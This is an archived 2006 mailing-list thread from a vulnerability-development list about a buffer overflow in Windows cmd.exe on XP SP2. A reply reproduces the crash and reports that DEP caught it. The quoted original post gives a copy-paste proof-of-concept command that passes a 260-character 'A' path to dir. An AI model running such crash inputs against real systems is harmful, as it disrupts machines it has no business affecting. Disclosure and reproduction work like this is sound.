Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Windows Command Processor CMD.EXE Buffer Overflow

From: "Bernardo Wernesback" <bernardosw () gmail com>
Date: Mon, 23 Oct 2006 13:35:48 -0300
Reproduced the problem on Windows XP SP2 + All Patches English Version.

EventType : BEX     P1 : cmd.exe     P2 : 5.1.2600.2180     P3 : 41107ebe
P4 : unknown     P5 : 0.0.0.0     P6 : 00000000     P7 : 00410041
P8 : c0000005     P9 : 00000008

DEP went into action and generated a dump to be sent to Microsoft for cmd.exe.


On 10/19/06, gregory_panakkal  <gregory_panakkal () fastmail fm> wrote:


Windows Command Processor CMD.EXE Buffer Overflow
Tested on WinXP SP2
Impact - Very Low


Copy-paste the following line in cmd.exe and execute it..
(it is a single command, has been split into multiple lines for
readability sake).

%COMSPEC% /K "dir
\\?\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

(260 characters of 'A's)

DEP Comes into the picture.

URL :
 http://www.infogreg.com/security/misc/windows-command-processor-cmd.exe-buffer-overflow.html

regards,
Gregory Panakkal
www.infogreg.com
--
  gregory_panakkal
   gregory_panakkal () fastmail fm

--
http://www.fastmail.fm - I mean, what is it about a decent email service?
Previous By Date Next
Previous By Thread Next

Current thread: